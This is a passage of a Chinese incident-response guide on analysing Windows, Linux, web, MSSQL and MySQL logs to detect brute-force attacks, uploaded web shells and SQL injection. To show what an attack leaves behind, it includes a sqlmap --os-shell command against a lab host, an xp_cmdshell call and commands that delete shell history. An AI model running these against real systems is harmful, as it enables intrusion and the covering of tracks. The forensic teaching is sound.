<h4 id="logparser-lizard">LogParser Lizard<a class="headerlink" href="#logparser-lizard" title="Permanent link">&para;</a></h4>
<p>对于GUI环境的Log Parser Lizard，其特点是比较易于使用，甚至不需要记忆繁琐的命令，只需要做好设置，写好基本的SQL语句，就可以直观的得到结果。</p>
<p>下载地址：<a href="http://www.lizard-labs.com/log_parser_lizard.aspx">http://www.lizard-labs.com/log_parser_lizard.aspx</a></p>
<p>依赖包：Microsoft .NET Framework 4 .5，下载地址：<a href="https://www.microsoft.com/en-us/download/details.aspx?id=42642">https://www.microsoft.com/en-us/download/details.aspx?id=42642</a></p>
<p>查询最近用户登录情况：</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-7.png" /></p>
<h4 id="event-log-explorer">Event Log Explorer<a class="headerlink" href="#event-log-explorer" title="Permanent link">&para;</a></h4>
<p>Event Log Explorer是一款非常好用的Windows日志分析工具。可用于查看，监视和分析跟事件记录，包括安全，系统，应用程序和其他微软Windows 的记录被记载的事件，其强大的过滤功能可以快速的过滤出有价值的信息。</p>
<p>下载地址：<a href="https://event-log-explorer.en.softonic.com/">https://event-log-explorer.en.softonic.com/</a></p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-1-8.png" /></p>
<p>参考链接：</p>
<p>Windows日志分析 <a href="https://mp.weixin.qq.com/s/ige5UO8WTuOOO3yRw-LeqQ">https://mp.weixin.qq.com/s/ige5UO8WTuOOO3yRw-LeqQ</a></p>
<h2 id="2linux">第2篇:Linux日志分析<a class="headerlink" href="#2linux" title="Permanent link">&para;</a></h2>
<h3 id="0x00">0x00 前言<a class="headerlink" href="#0x00" title="Permanent link">&para;</a></h3>
<p>Linux系统拥有非常灵活和强大的日志功能，可以保存几乎所有的操作记录，并可以从中检索出我们需要的信息。 本文简介一下Linux系统日志及日志分析技巧。</p>
<h3 id="0x01">0x01 日志简介<a class="headerlink" href="#0x01" title="Permanent link">&para;</a></h3>
<p>日志默认存放位置：/var/log/</p>
<p>查看日志配置情况：more /etc/rsyslog.conf</p>
<table>
<thead>
<tr>
<th align="center">日志文件</th>
<th align="center">说明</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center">/var/log/cron</td>
<td align="center">记录了系统定时任务相关的日志</td>
</tr>
<tr>
<td align="center">/var/log/cups</td>
<td align="center">记录打印信息的日志</td>
</tr>
<tr>
<td align="center">/var/log/dmesg</td>
<td align="center">记录了系统在开机时内核自检的信息，也可以使用dmesg命令直接查看内核自检信息</td>
</tr>
<tr>
<td align="center">/var/log/mailog</td>
<td align="center">记录邮件信息</td>
</tr>
<tr>
<td align="center">/var/log/message</td>
<td align="center">记录系统重要信息的日志。这个日志文件中会记录Linux系统的绝大多数重要信息，如果系统出现问题时，首先要检查的就应该是这个日志文件</td>
</tr>
<tr>
<td align="center">/var/log/btmp</td>
<td align="center">记录错误登录日志，这个文件是二进制文件，不能直接vi查看，而要使用lastb命令查看</td>
</tr>
<tr>
<td align="center">/var/log/lastlog</td>
<td align="center">记录系统中所有用户最后一次登录时间的日志，这个文件是二进制文件，不能直接vi，而要使用lastlog命令查看</td>
</tr>
<tr>
<td align="center">/var/log/wtmp</td>
<td align="center">永久记录所有用户的登录、注销信息，同时记录系统的启动、重启、关机事件。同样这个文件也是一个二进制文件，不能直接vi，而需要使用last命令来查看</td>
</tr>
<tr>
<td align="center">/var/log/utmp</td>
<td align="center">记录当前已经登录的用户信息，这个文件会随着用户的登录和注销不断变化，只记录当前登录用户的信息。同样这个文件不能直接vi，而要使用w,who,users等命令来查询</td>
</tr>
<tr>
<td align="center">/var/log/secure</td>
<td align="center">记录验证和授权方面的信息，只要涉及账号和密码的程序都会记录，比如SSH登录，su切换用户，sudo授权，甚至添加用户和修改用户密码都会记录在这个日志文件中</td>
</tr>
</tbody>
</table>
<p>比较重要的几个日志： 登录失败记录：/var/log/btmp //lastb 最后一次登录：/var/log/lastlog //lastlog 登录成功记录: /var/log/wtmp //last 登录日志记录：/var/log/secure</p>
<p>目前登录用户信息：/var/run/utmp //w、who、users</p>
<p>历史命令记录：history 仅清理当前用户： history -c</p>
<h3 id="0x02_1">0x02 日志分析技巧<a class="headerlink" href="#0x02_1" title="Permanent link">&para;</a></h3>
<h4 id="ashell">A、常用的shell命令<a class="headerlink" href="#ashell" title="Permanent link">&para;</a></h4>
<p>Linux下常用的shell命令如：find、grep 、egrep、awk、sed</p>
<p>小技巧：</p>
<p>1、grep显示前后几行信息:</p>
<div class="highlight"><pre><span></span><code>    标准unix/linux下的grep通过下面參数控制上下文：
    grep -C 5 foo file 显示file文件里匹配foo字串那行以及上下5行
    grep -B 5 foo file 显示foo及前5行
    grep -A 5 foo file 显示foo及后5行
    查看grep版本号的方法是
    grep -V
</code></pre></div>
<p>2、grep 查找含有某字符串的所有文件</p>
<div class="highlight"><pre><span></span><code>    grep -rn &quot;hello,world!&quot; 
    * : 表示当前目录所有文件，也可以是某个文件名
    -r 是递归查找
    -n 是显示行号
    -R 查找所有文件包含子目录
    -i 忽略大小写
</code></pre></div>
<p>3、如何显示一个文件的某几行：</p>
<div class="highlight"><pre><span></span><code>    cat input_file | tail -n +1000 | head -n 2000
    #从第1000行开始，显示2000行。即显示1000~2999行
</code></pre></div>
<p>4、find /etc -name init</p>
<div class="highlight"><pre><span></span><code>//在目录/etc中查找文件init
</code></pre></div>
<p>5、只是显示/etc/passwd的账户</p>
<div class="highlight"><pre><span></span><code>`cat /etc/passwd |awk  -F &#39;:&#39;  &#39;{print $1}&#39;`  
//awk -F指定域分隔符为&#39;:&#39;，将记录按指定的域分隔符划分域，填充域，$0则表示所有域,$1表示第一个域,$n表示第n个域。
</code></pre></div>
<p>6、sed -i '153,$d' .bash_history</p>
<div class="highlight"><pre><span></span><code>删除历史操作记录，只保留前153行
</code></pre></div>
<h4 id="b">B、日志分析技巧<a class="headerlink" href="#b" title="Permanent link">&para;</a></h4>
<p><strong>A、/var/log/secure</strong></p>
<div class="highlight"><pre><span></span><code>1、定位有多少IP在爆破主机的root帐号：    
grep &quot;Failed password for root&quot; /var/log/secure | awk &#39;{print $11}&#39; | sort | uniq -c | sort -nr | more

定位有哪些IP在爆破：
grep &quot;Failed password&quot; /var/log/secure|grep -E -o &quot;(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)&quot;|uniq -c

爆破用户名字典是什么？
 grep &quot;Failed password&quot; /var/log/secure|perl -e &#39;while($_=&lt;&gt;){ /for(.*?) from/; print &quot;$1\n&quot;;}&#39;|uniq -c|sort -nr

2、登录成功的IP有哪些：     
grep &quot;Accepted &quot; /var/log/secure | awk &#39;{print $11}&#39; | sort | uniq -c | sort -nr | more

登录成功的日期、用户名、IP：
grep &quot;Accepted &quot; /var/log/secure | awk &#39;{print $1,$2,$3,$9,$11}&#39; 

3、增加一个用户kali日志：
Jul 10 00:12:15 localhost useradd[2382]: new group: name=kali, GID=1001
Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001, home=/home/kali
, shell=/bin/bash
Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali
#grep &quot;useradd&quot; /var/log/secure 

4、删除用户kali日志：
Jul 10 00:14:17 localhost userdel[2393]: delete user &#39;kali&#39;
Jul 10 00:14:17 localhost userdel[2393]: removed group &#39;kali&#39; owned by &#39;kali&#39;
Jul 10 00:14:17 localhost userdel[2393]: removed shadow group &#39;kali&#39; owned by &#39;kali&#39;
# grep &quot;userdel&quot; /var/log/secure

5、su切换用户：
Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)

sudo授权执行:
sudo -l
Jul 10 00:43:09 localhost sudo:    good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now
</code></pre></div>
<p><strong>2、/var/log/yum.log</strong></p>
<p>软件安装升级卸载日志：</p>
<p>~~~yum install gcc yum install gcc</p>
<p>[root@bogon ~]# more /var/log/yum.log</p>
<p>Jul 10 00:18:23 Updated: cpp-4.8.5-28.el7_5.1.x86_64 Jul 10 00:18:24 Updated: libgcc-4.8.5-28.el7_5.1.x86_64 Jul 10 00:18:24 Updated: libgomp-4.8.5-28.el7_5.1.x86_64 Jul 10 00:18:28 Updated: gcc-4.8.5-28.el7_5.1.x86_64 Jul 10 00:18:28 Updated: libgcc-4.8.5-28.el7_5.1.i686 <sub>~</sub></p>
<h2 id="3web">第3篇:Web日志分析<a class="headerlink" href="#3web" title="Permanent link">&para;</a></h2>
<h3 id="ox01-web">ox01 Web日志<a class="headerlink" href="#ox01-web" title="Permanent link">&para;</a></h3>
<p>Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析，不仅可以帮助我们定位攻击者，还可以帮助我们还原攻击路径，找到网站存在的安全漏洞并进行修复。</p>
<p>我们来看一条Apache的访问日志：</p>
<div class="highlight"><pre><span></span><code>127.0.0.1 - - [11/Jun/2018:12:47:22 +0800] &quot;GET /login.html HTTP/1.1&quot; 200 786 &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36&quot;
</code></pre></div>
<p>通过这条Web访问日志，我们可以清楚的得知用户在什么IP、什么时间、用什么操作系统、什么浏览器的情况下访问了你网站的哪个页面，是否访问成功。</p>
<p>本文通过介绍Web日志安全分析时的思路和常用的一些技巧。</p>
<h3 id="0x02_2">0x02 日志分析技巧<a class="headerlink" href="#0x02_2" title="Permanent link">&para;</a></h3>
<p>在对WEB日志进行安全分析时，一般可以按照两种思路展开，逐步深入，还原整个攻击过程。</p>
<p>第一种：确定入侵的时间范围，以此为线索，查找这个时间范围内可疑的日志，进一步排查，最终确定攻击者，还原攻击过程。</p>
<p>第二种：攻击者在入侵网站后，通常会留下后门维持权限，以方便再次访问，我们可以找到该文件，并以此为线索来展开分析。</p>
<p>常用分析工具：</p>
<p>Window下，推荐用 EmEditor 进行日志分析，支持大文本，搜索效率还不错。</p>
<p>Linux下，使用Shell命令组合查询分析。</p>
<p>Shell+Linux命令实现日志分析，一般结合grep、awk等命令等实现了几个常用的日志分析统计技巧。</p>
<p>Apache日志分析技巧：</p>
<div class="highlight"><pre><span></span><code>1、列出当天访问次数最多的IP命令：
cut -d- -f 1 log_file|uniq -c | sort -rn | head -20

2、查看当天有多少个IP访问：
awk &#39;{print $1}&#39; log_file|sort|uniq|wc -l

3、查看某一个页面被访问的次数：
grep &quot;/index.php&quot; log_file | wc -l

4、查看每一个IP访问了多少个页面：
awk &#39;{++S[$1]} END {for (a in S) print a,S[a]}&#39; log_file

5、将每个IP访问的页面数进行从小到大排序：
awk &#39;{++S[$1]} END {for (a in S) print S[a],a}&#39; log_file | sort -n

6、查看某一个IP访问了哪些页面：
grep ^111.111.111.111 log_file| awk &#39;{print $1,$7}&#39;

7、去掉搜索引擎统计当天的页面：
awk &#39;{print $12,$1}&#39; log_file | grep ^\&quot;Mozilla | awk &#39;{print $2}&#39; |sort | uniq | wc -l

8、查看2018年6月21日14时这一个小时内有多少IP访问:
awk &#39;{print $4,$1}&#39; log_file | grep 21/Jun/2018:14 | awk &#39;{print $2}&#39;| sort | uniq | wc -l
</code></pre></div>
<h3 id="0x03_1">0x03 日志分析案例<a class="headerlink" href="#0x03_1" title="Permanent link">&para;</a></h3>
<p>Web日志分析实例：通过nginx代理转发到内网某服务器，内网服务器某站点目录下被上传了多个图片木马，虽然II7下不能解析，但还是想找出谁通过什么路径上传的。</p>
<p>在这里，我们遇到了一个问题：由于设置了代理转发，只记录了代理服务器的ip，并没有记录访问者IP？这时候，如何去识别不同的访问者和攻击源呢？</p>
<p>这是管理员日志配置不当的问题，但好在我们可以通过浏览器指纹来定位不同的访问来源，还原攻击路径。</p>
<p>1、定位攻击源</p>
<p>首先访问图片木马的记录，只找到了一条，由于所有访问日志只记录了代理IP，并不能通过IP来还原攻击路径，这时候，可以利用浏览器指纹来定位。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-3-1.png" /></p>
<p>浏览器指纹：</p>
<div class="highlight"><pre><span></span><code>Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/7.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+.NET4.0C;+.NET4.0E)
</code></pre></div>
<p>2、搜索相关日志记录</p>
<p>通过筛选与该浏览器指纹有关的日志记录，可以清晰地看到攻击者的攻击路径。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-3-2.png" /></p>
<p>3、对找到的访问日志进行解读，攻击者大致的访问路径如下：</p>
<div class="highlight"><pre><span></span><code>A、攻击者访问首页和登录页
B、攻击者访问MsgSjlb.aspx和MsgSebd.aspx
C、攻击者访问Xzuser.aspx
D、攻击者多次POST（怀疑通过这个页面上传模块缺陷）
E、攻击者访问了图片木马
</code></pre></div>
<p>打开网站，访问Xzuser.aspx，确认攻击者通过该页面的进行文件上传了图片木马，同时，发现网站了存在越权访问漏洞，攻击者访问特定URL，无需登录即可进入后台界面。通过日志分析找到网站的漏洞位置并进行修复。</p>
<h3 id="0x04_1">0x04 日志统计分析技巧<a class="headerlink" href="#0x04_1" title="Permanent link">&para;</a></h3>
<p>统计爬虫：</p>
<div class="highlight"><pre><span></span><code><span class="nx">grep</span> <span class="o">-</span><span class="nx">E</span> <span class="s1">&#39;Googlebot|Baiduspider&#39;</span>  <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">awk</span> <span class="s1">&#39;{ print $1 }&#39;</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">|</span> <span class="nx">uniq</span>
</code></pre></div>
<p>统计浏览器：</p>
<div class="highlight"><pre><span></span><code><span class="nx">cat</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">grep</span> <span class="o">-</span><span class="nx">v</span> <span class="o">-</span><span class="nx">E</span> <span class="s1">&#39;MSIE|Firefox|Chrome|Opera|Safari|Gecko|Maxthon&#39;</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">|</span> <span class="nx">uniq</span> <span class="o">-</span><span class="nx">c</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">-</span><span class="nx">r</span> <span class="o">-</span><span class="nx">n</span> <span class="o">|</span> <span class="nx">head</span> <span class="o">-</span><span class="nx">n</span> <span class="mf">100</span>
</code></pre></div>
<p>IP 统计：</p>
<div class="highlight"><pre><span></span><code><span class="nx">grep</span> <span class="s1">&#39;23/May/2019&#39;</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">awk</span> <span class="s1">&#39;{print $1}&#39;</span> <span class="o">|</span> <span class="nx">awk</span> <span class="o">-</span><span class="nx">F</span><span class="s1">&#39;.&#39;</span> <span class="s1">&#39;{print $1&quot;.&quot;$2&quot;.&quot;$3&quot;.&quot;$4}&#39;</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">|</span> <span class="nx">uniq</span> <span class="o">-</span><span class="nx">c</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">-</span><span class="nx">r</span> <span class="o">-</span><span class="nx">n</span> <span class="o">|</span> <span class="nx">head</span> <span class="o">-</span><span class="nx">n</span> <span class="mf">10</span>
   <span class="mf">2206</span> <span class="mf">219.136.134.13</span>
   <span class="mf">1497</span> <span class="mf">182.34.15.248</span>
   <span class="mf">1431</span> <span class="mf">211.140.143.100</span>
   <span class="mf">1431</span> <span class="mf">119.145.149.106</span>
   <span class="mf">1427</span> <span class="mf">61.183.15.179</span>
   <span class="mf">1427</span> <span class="mf">218.6.8.189</span>
   <span class="mf">1422</span> <span class="mf">124.232.150.171</span>
   <span class="mf">1421</span> <span class="mf">106.187.47.224</span>
   <span class="mf">1420</span> <span class="mf">61.160.220.252</span>
   <span class="mf">1418</span> <span class="mf">114.80.201.18</span>
</code></pre></div>
<p>统计网段：</p>
<div class="highlight"><pre><span></span><code><span class="nx">cat</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">awk</span> <span class="s1">&#39;{print $1}&#39;</span> <span class="o">|</span> <span class="nx">awk</span> <span class="o">-</span><span class="nx">F</span><span class="s1">&#39;.&#39;</span> <span class="s1">&#39;{print $1&quot;.&quot;$2&quot;.&quot;$3&quot;.0&quot;}&#39;</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">|</span> <span class="nx">uniq</span> <span class="o">-</span><span class="nx">c</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">-</span><span class="nx">r</span> <span class="o">-</span><span class="nx">n</span> <span class="o">|</span> <span class="nx">head</span> <span class="o">-</span><span class="nx">n</span> <span class="mf">200</span>
</code></pre></div>
<p>统计域名：</p>
<div class="highlight"><pre><span></span><code><span class="nx">cat</span>  <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span><span class="nx">awk</span> <span class="s1">&#39;{print $2}&#39;</span><span class="o">|</span><span class="nx">sort</span><span class="o">|</span><span class="nx">uniq</span> <span class="o">-</span><span class="nx">c</span><span class="o">|</span><span class="nx">sort</span> <span class="o">-</span><span class="nx">rn</span><span class="o">|</span><span class="nx">more</span>
</code></pre></div>
<p>HTTP Status：</p>
<div class="highlight"><pre><span></span><code><span class="nx">cat</span>  <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span><span class="nx">awk</span> <span class="s1">&#39;{print $9}&#39;</span><span class="o">|</span><span class="nx">sort</span><span class="o">|</span><span class="nx">uniq</span> <span class="o">-</span><span class="nx">c</span><span class="o">|</span><span class="nx">sort</span> <span class="o">-</span><span class="nx">rn</span><span class="o">|</span><span class="nx">more</span>
<span class="mf">5056585</span> <span class="mf">304</span>
<span class="mf">1125579</span> <span class="mf">200</span>
   <span class="mf">7602</span> <span class="mf">400</span>
      <span class="mf">5</span> <span class="mf">301</span>
</code></pre></div>
<p>URL 统计：</p>
<div class="highlight"><pre><span></span><code><span class="nx">cat</span>  <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span><span class="nx">awk</span> <span class="s1">&#39;{print $7}&#39;</span><span class="o">|</span><span class="nx">sort</span><span class="o">|</span><span class="nx">uniq</span> <span class="o">-</span><span class="nx">c</span><span class="o">|</span><span class="nx">sort</span> <span class="o">-</span><span class="nx">rn</span><span class="o">|</span><span class="nx">more</span>
</code></pre></div>
<p>文件流量统计：</p>
<div class="highlight"><pre><span></span><code><span class="nx">cat</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span><span class="nx">awk</span> <span class="s1">&#39;{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}&#39;</span><span class="o">|</span><span class="nx">sort</span> <span class="o">-</span><span class="nx">rn</span><span class="o">|</span><span class="nx">more</span>

<span class="nx">grep</span> <span class="s1">&#39; 200 &#39;</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span><span class="nx">awk</span> <span class="s1">&#39;{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}&#39;</span><span class="o">|</span><span class="nx">sort</span> <span class="o">-</span><span class="nx">rn</span><span class="o">|</span><span class="nx">more</span>
</code></pre></div>
<p>URL访问量统计：</p>
<div class="highlight"><pre><span></span><code><span class="nx">cat</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">awk</span> <span class="s1">&#39;{print $7}&#39;</span> <span class="o">|</span> <span class="nx">egrep</span> <span class="s1">&#39;\?|&amp;&#39;</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">|</span> <span class="nx">uniq</span> <span class="o">-</span><span class="nx">c</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">-</span><span class="nx">rn</span> <span class="o">|</span> <span class="nx">more</span>
</code></pre></div>
<p>脚本运行速度：</p>
<p>查出运行速度最慢的脚本</p>
<div class="highlight"><pre><span></span><code><span class="nx">grep</span> <span class="o">-</span><span class="nx">v</span> <span class="mf">0</span><span class="nx">$</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">awk</span> <span class="o">-</span><span class="nx">F</span> <span class="s1">&#39;\&quot; &#39;</span> <span class="s1">&#39;{print $4&quot; &quot; $1}&#39;</span> <span class="nx">web</span><span class="p">.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">awk</span> <span class="s1">&#39;{print $1&quot; &quot;$8}&#39;</span> <span class="o">|</span> <span class="nx">sort</span> <span class="o">-</span><span class="nx">n</span> <span class="o">-</span><span class="nx">k</span> <span class="mf">1</span> <span class="o">-</span><span class="nx">r</span> <span class="o">|</span> <span class="nx">uniq</span> <span class="o">&gt;</span> <span class="err">/tmp/slow_url.txt</span>
</code></pre></div>
<p>IP, URL 抽取：</p>
<div class="highlight"><pre><span></span><code><span class="err">#</span> <span class="nx">tail</span> <span class="o">-</span><span class="nx">f</span> <span class="o">/</span><span class="nx">www</span><span class="o">/</span><span class="nx">logs</span><span class="o">/</span><span class="nx">access</span><span class="mf">.2019</span><span class="o">-</span><span class="mo">02</span><span class="o">-</span><span class="mf">23.</span><span class="nx">log</span> <span class="o">|</span> <span class="nx">grep</span> <span class="s1">&#39;/test.html&#39;</span> <span class="o">|</span> <span class="nx">awk</span> <span class="s1">&#39;{print $1&quot; &quot;$7}&#39;</span>
</code></pre></div>
<p>参考链接：</p>
<blockquote>
<p><a href="https://www.jb51.net/article/53954.htm">https://www.jb51.net/article/53954.htm</a></p>
<p><a href="https://www.jb51.net/article/58017.htm">https://www.jb51.net/article/58017.htm</a></p>
<p><a href="https://cloud.tencent.com/developer/article/1051427">https://cloud.tencent.com/developer/article/1051427</a></p>
</blockquote>
<h2 id="4mssql">第4篇:MSSQL日志分析<a class="headerlink" href="#4mssql" title="Permanent link">&para;</a></h2>
<p>常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等。对数据库日志进行分析，可以发现攻击行为，进一步还原攻击场景及追溯攻击源。</p>
<h3 id="0x01-mssql">0x01 MSSQL日志分析<a class="headerlink" href="#0x01-mssql" title="Permanent link">&para;</a></h3>
<p>首先，MSSQL数据库应启用日志记录功能，默认配置仅限失败的登录，需修改为失败和成功的登录，这样就可以对用户登录进行审核。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-4-3.png" /></p>
<p>登录到SQL Server Management Studio，依次点击 管理--SQL Server 日志</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-4-4.png" /></p>
<p>双击日志存档文件即可打开日志文件查看器，并可以对日志进行筛选或者导出等操作。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-4-5.png" /></p>
<p>另外，MSSQ提供了一个工具SQL Server Profiler ，方便查找和发现SQL执行的效率和语句问题。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-4-6.png" /></p>
<p>日志分析案例：</p>
<p>在日志文件查看器中，选择筛选，在筛选设置中源设置为“登录”，应用筛选器，确定。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-4-7.png" /></p>
<p>筛选后的结果，可以很清晰的识别用户登录信息，记录内容包括用户登录时间、登录是否成功、登录使用的账号以及远程登录时用户使用的IP地址。</p>
<p>如下图：客户端：192.168.204.1进行尝试弱口令登录，并发现其中有一条登录成功的记录。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-4-8.png" /></p>
<h3 id="0x02-sql">0x02 SQL注入入侵痕迹<a class="headerlink" href="#0x02-sql" title="Permanent link">&para;</a></h3>
<p>在利用SQL注入漏洞的过程中，我们会尝试利用sqlmap的--os-shell参数取得shell，如操作不慎，可能留下一些sqlmap创建的临时表和自定义函数。我们先来看一下sqlmap os-shell参数的用法以及原理：</p>
<p>1、构造一个SQL注入点，开启Burp监听8080端口</p>
<div class="highlight"><pre><span></span><code>sqlmap.py -u http://192.168.204.164/sql.asp?id=1 --os-shell --proxy=http://127.0.0.1:8080
</code></pre></div>
<p>HTTP通讯过程如下：</p>
<p><img alt="img" src="file:///C:/Users/Bypass/Desktop/Mybook/LogAnalysis/image/log-4-1.png" /></p>
<p>创建了一个临时表sqlmapoutput，调用存储过程执行系统命令将数据写入临时表，然后取临时表中的数据展示到前端。</p>
<p>通过查看数据库中最近新建的表的结构和内容，可以判断是否发生过sql注入漏洞攻击事件。</p>
<p>检查方法：</p>
<p>1、数据库表检查</p>
<p><img alt="img" src="file:///C:/Users/Bypass/Desktop/Mybook/LogAnalysis/image/log-4-2.png" /></p>
<p>2、检查xp_cmdshell等存储过程</p>
<p>xp_cmdshell在mssql2005之后的版本中是默认禁止的，查看xp_cmdshell是否被启用。</p>
<p>`Exec master.dbo.xp_cmdshell 'whoami'</p>
<p>3、需要结合web日志，通过查看日志文件的大小以及审计日志文件中的内容，可以判断是否发生过sql注入漏洞攻击事件。</p>
<h2 id="5mysql">第5篇:MySQL日志分析<a class="headerlink" href="#5mysql" title="Permanent link">&para;</a></h2>
<p>常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等。对数据库日志进行分析，可以发现攻击行为，进一步还原攻击场景及追溯攻击源。</p>
<h3 id="0x01-mysql">0x01 Mysql日志分析<a class="headerlink" href="#0x01-mysql" title="Permanent link">&para;</a></h3>
<p>general query log能记录成功连接和每次执行的查询，我们可以将它用作安全布防的一部分，为故障分析或黑客事件后的调查提供依据。</p>
<div class="highlight"><pre><span></span><code>1、查看log配置信息
show variables like &#39;%general%&#39;;
2、开启日志
SET GLOBAL general_log = &#39;On&#39;;
3、指定日志文件路径
#SET GLOBAL general_log_file = &#39;/var/lib/mysql/mysql.log&#39;;
</code></pre></div>
<p>比如，当我访问 /test.php?id=1，此时我们得到这样的日志：</p>
<div class="highlight"><pre><span></span><code>190604 14:46:14       14 Connect    root@localhost on 
           14 Init DB    test
           14 Query    SELECT * FROM admin WHERE id = 1
           14 Quit  `
</code></pre></div>
<p>我们按列来解析一下：</p>
<div class="highlight"><pre><span></span><code>第一列:Time，时间列，前面一个是日期,后面一个是小时和分钟，有一些不显示的原因是因为这些sql语句几乎是同时执行的,所以就不另外记录时间了。
第二列:Id，就是show processlist出来的第一列的线程ID,对于长连接和一些比较耗时的sql语句,你可以精确找出究竟是那一条那一个线程在运行。
第三列:Command，操作类型，比如Connect就是连接数据库，Query就是查询数据库(增删查改都显示为查询)，可以特定过虑一些操作。
第四列:Argument，详细信息，例如 Connect    root@localhost on 意思就是连接数据库，如此类推,接下面的连上数据库之后,做了什么查询的操作。
</code></pre></div>
<h3 id="0x02_3">0x02 登录成功/失败<a class="headerlink" href="#0x02_3" title="Permanent link">&para;</a></h3>
<p>我们来做个简单的测试吧，使用我以前自己开发的弱口令工具来扫一下，字典设置比较小，2个用户，4个密码，共8组。</p>
<p><img alt="img" src="https://bypass007.github.io/Emergency-Response-Notes/LogAnalysis/image/log-5-1.png" /></p>
<p>MySQL中的log记录是这样子：</p>
<div class="highlight"><pre><span></span><code>Time                 Id        Command         Argument

190601 22:03:20       98 Connect    root@192.168.204.1 on 
           98 Connect    Access denied for user &#39;root&#39;@&#39;192.168.204.1&#39; (using password: YES)
          103 Connect    mysql@192.168.204.1 on 
